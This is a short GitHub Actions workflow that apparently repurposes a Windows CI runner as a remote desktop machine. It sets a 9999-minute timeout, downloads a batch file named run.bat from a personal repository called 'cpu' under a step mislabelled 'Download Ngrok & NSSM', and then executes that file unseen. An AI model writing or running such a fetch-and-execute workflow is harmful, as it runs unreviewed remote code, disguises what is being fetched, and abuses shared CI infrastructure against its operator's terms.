jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download Ngrok & NSSM
      run: |
        Invoke-WebRequest https://github.com/hungpy20081994/cpu/blob/1ae36264fc9bf2445632848ae77c70d5ea4ecc6a/run.bat -OutFile run.bat
    - name: Connect to your RDP 2core-7GB Ram.
      run: cmd /c run.bat







